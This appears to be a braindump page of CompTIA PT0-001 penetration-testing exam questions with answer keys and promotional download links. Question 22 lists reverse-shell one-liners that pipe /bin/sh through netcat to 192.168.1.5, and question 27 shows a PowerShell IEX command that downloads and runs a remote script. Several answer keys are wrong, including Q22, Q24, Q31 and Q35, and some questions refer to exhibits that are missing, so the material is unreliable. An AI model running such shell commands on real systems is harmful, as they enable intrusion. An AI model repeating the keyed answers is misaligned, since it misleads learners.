PT0-001 PDF Dumps Feb 07, 2022 Exam Questions – Valid PT0-001 Dumps
Ultimate PT0-001 Guide to Prepare Free Latest CompTIA Practice Tests Dumps
The CompTIA PT0-001 certification exam validates the knowledge and skills needed to plan and scope assessments, carry out penetration testing and vulnerability scanning with the use of the relevant techniques and tools. To develop these skills and pass the test, the candidates must understand the topics covered in it. They are as follows:
- Information Gathering & Vulnerability Identification: 22%
The potential candidates must be able to demonstrate the capability to carry out information gathering through the use of the relevant techniques, carry out a vulnerability scan, and analyze the vulnerability of the scanned results. They should also be able to describe the process involved in leveraging information for preparation of exploitation and the weaknesses associated with specialized systems.
- Attacks & Exploits: 30%
This topic requires that the learners develop competence in comparing and contrasting social engineering attacks as well as exploiting various network-based, RF-based, and wireless vulnerabilities, different app-based vulnerabilities, and local host vulnerabilities. Summarizing physical security attacks associated with facilities and carrying out post-exploitation methods are the skills that you need to have as well.
- Reporting & Communication: 16%
This section requires that the test takers have competence in handling best practices and using report writing, describing post-report delivery events, recommending mitigation strategies for identified vulnerabilities, and describing the significance of communication in the process of penetration testing.
- Planning & Scoping: 15%
This subject area measures the competence of the applicants in the significance of planning for engagements as well as describing core legal concepts, the significance of scoping engagements appropriately, and the core areas of compliance-based assessments.
- Penetration & Testing Tools: 17%
This domain measures the ability of the students to utilize Nmap to carry out information gathering. You should also have the skills in comparing and contrasting different use cases of tools, analyzing tool output to penetration testing, as well as analyzing the basic scripts, including Python, Limited to Bash, PowerShell, and Ruby.
NEW QUESTION 22
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
- A. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
- B. nc -e /bin/sh 192.168.1.5 44444
- C. nc 192.168.1.5 44444
- D. nc -nlvp 44444 -e /bin/sh
- E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
- F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/
Answer: D,E
Explanation:
Explanation/Reference: https://www.reddit.com/r/hacking/comments/5ms9gv/help_reverse_shell_exploit/
NEW QUESTION 23
A penetration tester identifies the following findings during an external vulnerability scan:
Which of the following attack strategies should be prioritized from the scan results above?
- A. Weak password management practices may be employed
- B. Cryptographically weak protocols may be intercepted
- C. Web server configurations may reveal sensitive information
- D. Obsolete software may contain exploitable components
Answer: B
NEW QUESTION 24
A penetration tester runs the following from a compromised box 'python -c -import pty;Pty.sPawn( "/bin/bash").' Which of the following actions is the tester taking?
- A. Upgrading the shell
- B. Removing the Bash history
- C. Capturing credentials
- D. Creating a sandbox
Answer: B
NEW QUESTION 25
Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.
Answer:
Explanation:
Explanation
Step 1
Generate a Certificate Signing Request
Step 2
Submit CSR to the CA
Step 3
Installed re-issued certificate on the server
Step 4
Remove Certificate from Server
NEW QUESTION 26
A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provide text file that contain a list of IP addresses.
Which of the following are needed to conduct this scan? (Select TWO).
- A. -oN
- B. -sS
- C. -oX
- D. -O
- E. _sV
- F. _iL
Answer: D,F
NEW QUESTION 27
Consider the following PowerShell command:
powershell.exe
IEX (New-Object Net.Webclient).downloadstring(http://site/
script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed this command?
- A. Execute a remote script
- B. Instantiate an object
- C. Set the execution policy
- D. Run an encoded command
Answer: A
NEW QUESTION 28
A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)
B)
C)
D)
- A. Option C
- B. Option B
- C. Option A
- D. Option D
Answer: D
NEW QUESTION 29
Which of the following is an example of a spear phishing attack?
- A. Targeting random users with a USB key drop
- B. Targeting an organization with a watering hole attack
- C. Targeting an executive with an SMS attack
- D. Targeting a specific team with an email attack
Answer: C
NEW QUESTION 30
During an engagement an unsecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then exfil the information from a web application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:
Which of the following lines of code is causing the problem?
- A. if req.status ==200:
- B. url = "https://www.comptia.org?id="
- C. url += i
- D. req = requests.get(url)
Answer: C
NEW QUESTION 31
Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?
- A. Destination index register
- B. Index pointer register
- C. Stack base pointer
- D. Stack pointer register
Answer: D
NEW QUESTION 32
A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?
- A. Insecure file permissions
- B. Application Whitelisting
- C. Writable service
- D. Shell escape
Answer: A
Explanation:
References https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#john-the-ripper---jtr
NEW QUESTION 33
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?
- A. Send spoofed emails to staff to see if staff will respond with sensitive information.
- B. Obtain staff information by calling the company and using social engineering techniques.
- C. Visit the client and use impersonation to obtain information from staff.
- D. Search the internet for information on staff such as social networking sites.
Answer: D
Explanation:
Explanation/Reference: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it
NEW QUESTION 34
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
- A. Run-time analysis
- B. Fuzzing analysis
- C. Static analysis
- D. Dynamic analysis
Answer: C
Explanation:
Explanation/Reference: https://smartbear.com/learn/code-review/what-is-code-review/
NEW QUESTION 35
A file contains several hashes. Which of the following can be used in a pass-the-hash attack?
- A. NTLM
- B. NTLMv2
- C. LMv2
- D. Kerberos
- E. NTLMv1
Answer: D
NEW QUESTION 36
Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?
- A. wmic startup get caption, location, command | findstr /i "service" | findstr /v /i "%"
- B. wmic environment get name, variablevalue, username / findstr /i "Path" | findstr /i
"service" - C. wmic service get /format:hform > c:\temp\services.html
- D. wmic service get name, displayname, patchname, startmode | findstr /i "auto" | findstr /i
/v "c:\windows\\" | findstr /i /v """
Answer: D
NEW QUESTION 37
While reviewing logs, a web developer notices the following user input string in a field:
Which of the following types of attacks was done to the website?
- A. Reflected XSS
- B. Blind XSS
- C. XSS injection
- D. Persistent XSS
Answer: C
NEW QUESTION 38
Click the exhibit button.
A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
- A. SMTP relay
- B. SNMP brute forcing
- C. ARP spoofing
- D. DNS cache poisoning
Answer: B
NEW QUESTION 39
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
Step 1 - Generate a Certificate Signing Request
Step 2 - Submit CSR to the CA
Step 3 - Install re-issued certificate on the server
Step 4 - Remove Certificate from Server
NEW QUESTION 40
......
Passing Key To Getting PT0-001 Certified Exam Engine PDF: https://www.briandumpsprep.com/PT0-001-prep-exam-braindumps.html
Get Top-Rated CompTIA PT0-001 Exam Dumps Now: https://drive.google.com/open?id=1WYkKFowuXbSRa6NNzz5TbPZ222UJWUQR
